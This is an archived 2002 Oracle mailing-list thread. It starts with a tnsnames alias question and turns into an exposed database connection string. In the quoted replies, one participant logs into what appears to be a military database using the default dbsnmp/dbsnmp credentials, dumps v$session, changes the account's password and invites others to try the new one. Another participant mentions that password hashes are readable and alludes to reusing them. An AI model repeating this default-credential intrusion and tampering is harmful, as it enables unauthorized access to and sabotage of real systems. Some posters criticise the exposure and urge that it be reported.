Re: putting an alias in my tnsnames for a change to report server

From: Howard J. Rogers <dba_at_hjrdba.com>
Date: Fri, 12 Jul 2002 06:53:49 +1000
Message-ID: <agkr7i$hsh$1@lust.ihug.co.nz>

It is indeed astonishing.

The user dbsnmp appears to have rights to the dba_users view. That exposes everyone's hashed passwords. I didn't go any further with the usual 'alter user...values', but the implications are horrifying.

Thanks God this was only 8.1.7.2.1... had it been 9i, I would have been tempted to try a spurious left outer join....

It needs fixing as a matter of some urgency, that's for sure.

Regards
HJR "Daniel Morgan" <dmorgan_at_exesolutions.com> wrote in message news:3D2DAD51.D866DD54_at_exesolutions.com...
> Martin Haltmayer wrote:
>
> > Oh boy, don't be too sure!
> >
> > The tnsnames.ora used for this has the following entry, all deducted
from your
> > post:
> >
> > mil.world =
> > (description =
> > (address = (protocol = tcp) (host = 144.101.14.115 ) (port = 1521))
> > (connect_data = ( SERVICE_NAME = apandev.mtmc.army.mil ))
> > )
> >
> > G:\Daten\Martin\tests>sqlplus dbsnmp/dbsnmp_at_mil.world
> >
> > SQL*Plus: Release 8.1.7.0.0 - Production on Thu Jul 11 16:03:14 2002
> >
> > (c) Copyright 2000 Oracle Corporation. All rights reserved.
> >
> > Connected to:
> > Oracle8i Enterprise Edition Release 8.1.7.2.1 - Production
> > JServer Release 8.1.7.2.1 - Production
> >
> > SQL> set feedback on
> > SQL> set linesize 110
> > SQL> set pagesize 60
> > SQL> set timing on
> > SQL> set trimspool on
> > SQL> define _editor = lemmy.exe
> > SQL> set echo on
> > SQL> set feedback on
> > SQL> set linesize 1000
> > SQL> set pagesize 0
> > SQL> set timing on
> > SQL> set verify on
> > SQL> -- whenever sqlerror exit failure rollback
> > SQL> whenever sqlerror continue
> > SQL> select * from v$session;
> > 06D0D934 1 1 0 06CECB78
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 367 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 00 0 00 0
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28479 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D0E1A0 2 1 0 06CECEA0
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 394 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 00 0 00 0
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28482 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D0EA0C 3 1 0 06CED1C8
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 383 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 00 0 00 0
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28482 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D0F278 4 1 0 06CED4F0
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 347 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 00 0 00 0
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28482 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D0FAE4 5 1 0 06CED818
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 124 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 06833F20 1714733582 06833F20 1714733582
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28482 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D10350 6 1 0 06CEDB40
> > 0 0 2147483644
> > ACTIVE DEDICATE
> > D 0 SYS SYSTEM
> > 361 HQ73 HQ73
> > ORACLE.EXE

BACKGROUND
> > 06837CD0 3625995331 06837CD0 3625995331
> >
> > 0 0
> > 0 -1 0 0 0
> > 11-JUL-02 28482 NO NONE NONE NO
> > DISABLED ENABLED ENABLED
> > 06D10BBC 7 3 5788 06CEDE68 110
> > DBSNMP 0 2147483644
INACTIVE
> > DEDICATE
> > D 110 DBSNMP NT AUTHORITY\SYSTEM
> > 103:250 SPAN\HQ73 HQ73
> > dbsnmp.exe

USER
> > 068437D4 2501101467 068437D4 2501101467
> >
> > 0 0
> > 1 -1 0 0 0
> > 11-JUL-02 28463 NO NONE NONE NO
DEFAULT_CONSUMER_GROUP
> > DISABLED ENABLED ENABLED
> > 06D11428 8 133 5790 06CEE190 110
> > DBSNMP 3 2147483644
ACTIVE
> > DEDICATE
> > D 110 DBSNMP martin
> > 1204:688 WORKGROUP\SCHLEPPTOP

SC
> > HLEPPTOP
> > sqlplus.exe USER
> > 067AB990 3983320901 067AB990 3983320901 SQL*
> > Plus
> > 3669949024 4029777240
> > 3 -1 0
> > 0 0 11-JUL-02 0 NO NONE NONE NO
> > DEFAULT_C
> > ONSUMER_GROUP DISABLED ENABLED ENABLED
> >
> > 8 rows selected.
> >
> > Elapsed: 00:00:04.86
> > SQL>
> > SQL> alter user dbsnmp identified by blafasel;
> >
> > User altered.
> >
> > Elapsed: 00:00:01.92
> >
> > Just try the new password!
> >
> > Regards,
> >
> > Martin
> >
> > Ryan Gaffuri wrote:
> > >
> > > spamdump_at_nospam.noway.nohow (Ed Stevens) wrote in message
news:<3d22f243.176415341_at_ausnews.austin.ibm.com>...
> > > > On 2 Jul 2002 10:49:30 -0700, rgaffuri_at_cox.net (Ryan Gaffuri) wrote:
> > > >
> > > > >I tried to add an alias to my tnsnames on both my oracle server and
my
> > > > >developer server. This is what I added. Its not working.....
> > > > >
> > > > >Per note: 139546.1 at the end under known issues. It says to add an
> > > > >alias to my tnsnames to get around the issue with reports servers
have
> > > > >numbers, etc... in its name.
> > > > >
> > > > >Here is the part of the tnsnames.ora file that has the instance
that
> > > > >Im interested and what I added:
> > > > >
> > > > >APANDEV.MTMC.ARMY.MIL =
> > > > > (DESCRIPTION =
> > > > > (ADDRESS_LIST =
> > > > > (ADDRESS = (PROTOCOL = TCP)(HOST = 144.101.14.115)(PORT =
1521))
> > > > > )
> > > > > (CONNECT_DATA =
> > > > > (SERVICE_NAME = apandev.mtmc.army.mil)
> > > > > )
> > > > > )
> > > > >
> > > > >myserver

Rep60_HQ73-dev6i=(ADDRESS=(PROTOCOL=tcp)(HOST=HQ73-dev6i)(PORT
> > > > >1521)
> > > > >
> > > > >
> > > > >There are 4-5 others instances listed in this tnsnames.. the
> > > > >
> > > > >Rep60_HQ73-dev6i comes directly out of my registry. What did I do
> > > > >wrong? It does not recognize this when I try to run the report with
> > > > >run_report_object?
> > > >
> > > > The technical answer to your question has been answered. However,
I would like
> > > > to express some concern that you have exposed the IP address and
other connect
> > > > information of a military database. A good hacker (which I'm not)
now knows the
> > > > IP address, server DNS name, and listening port of a database server
owned by
> > > > the U.S. Army. Makes the hair stand up on the back of my neck.
> > >
> > > try the IP address it wont work. Thanks for your concern.
>
> I sincerely hope I am wrong. But is the above posting as flagrant
violation of security as it appears to be?
>
> If so please be responsible, report this immediately, and have the server
secured.
>
> Daniel Morgan
>
Received on Thu Jul 11 2002 - 15:53:49 CDT